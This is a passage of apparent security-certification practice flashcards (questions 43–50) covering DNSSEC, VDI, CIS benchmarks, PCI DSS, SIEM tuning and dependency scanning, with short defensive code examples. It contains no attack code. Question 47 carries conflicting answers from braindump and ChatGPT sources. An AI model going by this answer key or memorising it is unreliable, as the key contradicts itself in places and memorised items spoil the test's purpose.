NIST Framework: While the NIST Cybersecurity Framework is widely recognized and used for cybersecurity risk management in the United States, its adoption is not mandatory by law or regulation in international markets. It is more of a guideline and framework rather than a legal compliance requirement.

ISO 27001: This standard provides requirements for establishing, implementing, maintaining, and continually improving an information security management system (ISMS). While ISO 27001 is widely respected globally, it focuses on information security management rather than specific data privacy requirements.

PCI-DSS: The Payment Card Industry Data Security Standard (PCI-DSS) is applicable primarily to organizations that handle credit card transactions. While important for payment security, it does not comprehensively cover data protection concerns related to global expansion and compliance with international data privacy regulations like GDPR.

Therefore, given the global expansion and the need to comply with stringent data protection laws affecting international markets, the company’s data protection officer would be most concerned with ensuring compliance with GDPR.

43
Q

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?

a. Fog computing and KVMs
b. VDI and thin clients
c. Private cloud and DLP
d. Full drive encryption and thick clients

A

b. VDI (Virtual Desktop Infrastructure) and thin clients.

Here’s why this option is suitable:

VDI: Virtual Desktop Infrastructure allows users to access virtualized desktops hosted on servers in the data center. This means that the sensitive data remains centralized in the data center and is never stored or cached on the local workstations (thin clients) in the conference rooms. Users interact with their virtual desktop sessions over the network, and all data processing and storage occur centrally.

Thin clients: These are endpoint devices (workstations in the conference rooms) that are lightweight and designed to rely on the server-hosted virtual desktops. They have minimal storage and processing capabilities of their own, ensuring that no sensitive data is stored locally.

This solution ensures that:

Sensitive data remains under centralized control in the data center, reducing the risk of data exposure in the conference rooms.
Users can securely access and display sensitive data without the need for local storage or processing.
It aligns with the requirement of not storing sensitive data in the conference rooms, as all data handling is done within the secure environment of the data center.

Therefore, VDI and thin clients provide a secure and efficient solution for displaying sensitive data in conference rooms while maintaining compliance with data protection requirements.

44
Q

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented?

a. DNSSEC
b. LDAPS
c. NGFW
d. DLP

A

a. DNSSEC (Domain Name System Security Extensions).

Explanation:

DNSSEC: DNSSEC is designed to protect the integrity and authenticity of DNS data. It uses cryptographic signatures to ensure that DNS responses (including zone transfers) have not been tampered with. By signing DNS data, DNSSEC provides a way to verify that the information received from a DNS server is authentic and has not been altered in transit.

Implementing DNSSEC ensures that:

DNS responses, including zone transfers, are authenticated and their integrity is validated.
It mitigates the risk of DNS spoofing or cache poisoning attacks.
It provides an additional layer of security for DNS infrastructure by ensuring that any changes or transfers of DNS zone data are verified and trusted.

Therefore, DNSSEC is the solution that should be implemented to validate and check the integrity of zone transfers.
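
As a rough illustration of the kind of signature checking DNSSEC provides, the snippet below uses the dnspython library to fetch a zone's DNSKEY records and verify their RRSIG. This is a sketch, not a full chain-of-trust validation; the resolver address and the assumption that the answer section arrives as a [DNSKEY RRset, RRSIG RRset] pair are mine:

import dns.dnssec
import dns.message
import dns.name
import dns.query
import dns.rdatatype

zone = dns.name.from_text("example.com")

# Ask for the zone's DNSKEY records with the DNSSEC OK (DO) bit set
request = dns.message.make_query(zone, dns.rdatatype.DNSKEY, want_dnssec=True)
response = dns.query.udp(request, "8.8.8.8", timeout=5)

# Assumes the answer section comes back as [DNSKEY RRset, RRSIG RRset]
dnskey_rrset, rrsig_rrset = response.answer

try:
    # Verify the RRSIG over the DNSKEY set using the zone's own keys
    dns.dnssec.validate(dnskey_rrset, rrsig_rrset, {zone: dnskey_rrset})
    print("DNSKEY RRset signature validates")
except dns.dnssec.ValidationFailure:
    print("Signature did NOT validate -- the data may have been tampered with")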

LDAPS (Lightweight Directory Access Protocol Secure):

Purpose: LDAPS is used for securing directory services, such as those provided by Active Directory. It encrypts LDAP traffic to ensure confidentiality and integrity during communication.
Why Not Suitable: LDAPS does not deal with DNS or DNS zone transfers. Its primary use is for directory services, not DNS.

NGFW (Next-Generation Firewall):

Purpose: NGFWs provide advanced filtering capabilities, including application awareness, intrusion prevention, and deep packet inspection.
Why Not Suitable: While NGFWs enhance network security, they do not specifically address the integrity and authentication of DNS zone transfers. They are more about protecting the network perimeter and internal network traffic.

DLP (Data Loss Prevention):

Purpose: DLP solutions are designed to prevent the unauthorized transfer of sensitive data outside the organization. They monitor, detect, and block potential data breaches.
Why Not Suitable: DLP focuses on preventing data leaks and protecting sensitive information, not on DNS operations or ensuring the integrity of DNS zone transfers.

45
Q

Which of the following controls is used to make an organization initially aware of a data compromise?

a. Protective
b. Preventative
c. Corrective
d. Detective

A

d. Detective

Explanation:

Detective Controls: These controls are designed to identify and alert on incidents or breaches as they occur. They monitor systems, networks, and activities to detect suspicious or malicious behavior. Examples include intrusion detection systems (IDS), security information and event management (SIEM) systems, and log monitoring.

Why not the others?:

Protective Controls: This is not a standard control category; the term overlaps with preventative and detective controls.
Preventative Controls: These controls are designed to prevent security incidents from occurring in the first place. Examples include firewalls, anti-virus software, and access control mechanisms. They aim to block or mitigate potential threats before they can cause harm.
Corrective Controls: These controls are implemented to correct or mitigate the effects of an incident after it has occurred. Examples include patch management, data recovery processes, and incident response plans.

Detective controls are specifically focused on discovering and alerting about ongoing or past security incidents, making them the correct choice for being initially aware of a data compromise.

46
Q

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

a. CIS benchmarks
b. GDPR guidance
c. Regional regulations
d. ISO 27001 standards

A

a. CIS benchmarks

Explanation:

CIS (Center for Internet Security) benchmarks: These are globally recognized security standards and best practices for securing IT systems and data. They provide detailed configuration guidelines for various operating systems, applications, and network devices. Using CIS benchmarks ensures that OS-level configurations are updated to the latest and most secure settings.
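
Checks against benchmarks like these are usually automated. As a toy illustration of the idea, the Python below audits two common SSH hardening settings; the expected values echo typical CIS-style guidance but are illustrative, not quoted from any specific benchmark:

import re

CONFIG_FILE = "/etc/ssh/sshd_config"
EXPECTED = {"PermitRootLogin": "no", "X11Forwarding": "no"}  # illustrative checks

def audit(path: str, expected: dict) -> None:
    with open(path) as f:
        text = f.read()
    for key, want in expected.items():
        # Match only non-commented occurrences of the directive
        match = re.search(rf"^\s*{key}\s+(\S+)", text, re.MULTILINE)
        have = match.group(1) if match else "<unset>"
        status = "PASS" if have.lower() == want else "FAIL"
        print(f"{status}: {key} = {have} (expected {want})")

audit(CONFIG_FILE, EXPECTED)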

Why not the others?:

GDPR guidance: The General Data Protection Regulation (GDPR) is primarily focused on data protection and privacy for individuals within the European Union. It does not provide specific guidelines for OS-level configurations or security hardening.
Regional regulations: These may include various legal requirements depending on the region, but they are typically not specific or detailed enough to guide the hardening of OS configurations. They often focus on broader compliance issues rather than specific technical configurations.
ISO 27001 standards: ISO 27001 is a standard for information security management systems (ISMS). While it provides a framework for managing information security, it does not offer specific, detailed configuration guidelines for operating systems.

CIS benchmarks are specifically designed to provide detailed and actionable guidance on securing OS-level configurations, making them the most appropriate choice for addressing the findings of an information security assessment.

47
Q

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

a. High availability
b. Application security
c. Segmentation
d. Integration and auditing

A

(Community : D 45%, C 43%)
(Braindump : D )
d. Integration and auditing

The company is transitioning network services to the cloud (they also just acquired several other small companies). The company’s primary focus in this scenario is to ensure performance and security REMAIN intact.

The key word: “remain intact” meaning they already have strong performance and security but they want this to continue while transitioning these additional companies and their network services to the cloud.

ChatGPT
c. Segmentation

Explanation:

Segmentation: This involves dividing a network into multiple smaller segments or subnets, each with its own set of security policies and controls. Segmentation can help improve both performance and security by isolating different parts of the network, reducing the attack surface, and limiting the spread of potential security breaches. By isolating critical services and workloads, segmentation ensures that performance issues in one segment do not affect others, and it also helps in containing and managing security incidents more effectively.

Why not the others?:

High availability: While high availability ensures that systems remain operational with minimal downtime, it primarily addresses performance and reliability, not security.
Application security: This focuses on securing applications from threats and vulnerabilities. While important, it does not address the broader network-level security and performance concerns that segmentation does.
Integration and auditing: These are important for ensuring that systems work well together and for maintaining logs and records for compliance and monitoring. However, they do not directly address the need to optimize both performance and security across the network.

By implementing segmentation, the company can ensure that its network remains secure and performs efficiently as it transitions services to the cloud and integrates the newly acquired companies.

48
Q

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team’s GREATEST concern?

a. PCI DSS
b. GDPR
c. ISO 27001
d. NIST CSF

A

a. PCI DSS

Explanation:

PCI DSS (Payment Card Industry Data Security Standard): This framework specifically addresses the security of cardholder data. One of its core requirements is the protection of stored cardholder data, which includes encrypting cardholder data at rest to ensure its confidentiality and integrity.

Why not the others?:

GDPR (General Data Protection Regulation): While GDPR emphasizes the protection of personal data and includes provisions for data encryption, its primary focus is on the privacy and rights of individuals in the European Union. It does not specifically target cardholder data security.
ISO 27001: This is an international standard for information security management systems (ISMS). While it provides a comprehensive framework for managing security risks and includes controls for data protection, it is not specifically focused on cardholder data.
NIST CSF (National Institute of Standards and Technology Cybersecurity Framework): This framework provides guidelines for managing and reducing cybersecurity risks but is more general in nature. It is not specifically designed to address the requirements for protecting cardholder data.

49
Q

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

a. Adjust the data flow from authentication sources to the SIEM.
b. Disable email alerting and review the SIEM directly.
c. Adjust the sensitivity levels of the SIEM correlation engine.
d. Utilize behavioral analysis to enable the SIEM’s learning mode.

A

d. Utilize behavioral analysis to enable the SIEM’s learning mode.

Explanation:

Utilize behavioral analysis to enable the SIEM's learning mode: This approach allows the SIEM to learn what constitutes normal behavior for users and systems over time. By establishing a baseline of normal operations, the SIEM can more effectively distinguish between typical activities and potential anomalies, thus reducing false positives and noise in the alerts.
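
The "learning mode" approach amounts to building a per-user statistical baseline and alerting only on significant deviations from it. A toy version of that logic (the history values and the three-sigma threshold are illustrative):

import statistics

# Daily login counts observed for one user during the learning period (example data)
history = [4, 5, 3, 6, 4, 5, 4, 6, 5, 4]

mean = statistics.mean(history)
stdev = statistics.stdev(history)

def is_anomalous(todays_logins: int, sigmas: float = 3.0) -> bool:
    # Flag only values well outside the learned baseline, which cuts alert noise
    return abs(todays_logins - mean) > sigmas * stdev

print(is_anomalous(5))   # False -- within normal behavior
print(is_anomalous(40))  # True  -- worth an alert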

Why not the others?:

Adjust the data flow from authentication sources to the SIEM: While this could help manage the volume of data, it does not address the issue of distinguishing between normal and malicious activities.
Disable email alerting and review the SIEM directly: This action only changes the method of alert notification and does not solve the problem of high alert volume or distinguishing between normal and malicious logins.
Adjust the sensitivity levels of the SIEM correlation engine: This might reduce the number of alerts, but it can also lead to missing important security events. It does not help in establishing what is normal behavior versus malicious activity.

50
Q

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

a. Employ different techniques for server- and client-side validations
b. Use a different version control system for third-party libraries
c. Implement a vulnerability scan to assess dependencies earlier in the SDLC
d. Increase the number of penetration tests before software release

A

c. Implement a vulnerability scan to assess dependencies earlier in the SDLC

Explanation:

Implement a vulnerability scan to assess dependencies earlier in the SDLC: This approach involves scanning the third-party libraries for known vulnerabilities as part of the software development lifecycle (SDLC). By integrating vulnerability scanning tools early and throughout the development process, developers can identify and address security flaws in third-party dependencies before the software is released into production.
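
In practice this is done with software composition analysis (SCA) tools such as OWASP Dependency-Check or pip-audit running as a build step. As a minimal sketch of what such a check does, the snippet below queries the public OSV vulnerability database for one pinned Python dependency (the package and version are arbitrary examples):

import json
import urllib.request

# In a real pipeline, iterate over every entry in the project's lockfile
query = {
    "package": {"name": "requests", "ecosystem": "PyPI"},
    "version": "2.19.0",
}

req = urllib.request.Request(
    "https://api.osv.dev/v1/query",
    data=json.dumps(query).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    result = json.load(resp)

# OSV returns an empty object when no known vulnerabilities match
for vuln in result.get("vulns", []):
    print(vuln["id"], "-", vuln.get("summary", "no summary available"))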

Why not the others?:

Employ different techniques for server- and client-side validations: While important for overall security, this practice focuses on input validation and does not specifically target security flaws in third-party libraries.
Use a different version control system for third-party libraries: Changing the version control system does not inherently address the security flaws in the libraries. The key is to identify vulnerabilities in the libraries themselves, not how they are managed.
Increase the number of penetration tests before software release: Penetration testing is valuable but typically occurs later in the SDLC and might not be as effective in identifying specific vulnerabilities in third-party libraries. Additionally, penetration tests are time-consuming and may miss some embedded library vulnerabilities that a dedicated vulnerability scan could catch earlier.

By implementing vulnerability scans to assess dependencies early and throughout the SDLC, you can effectively identify and mitigate security flaws in third-party libraries before they affect production environments.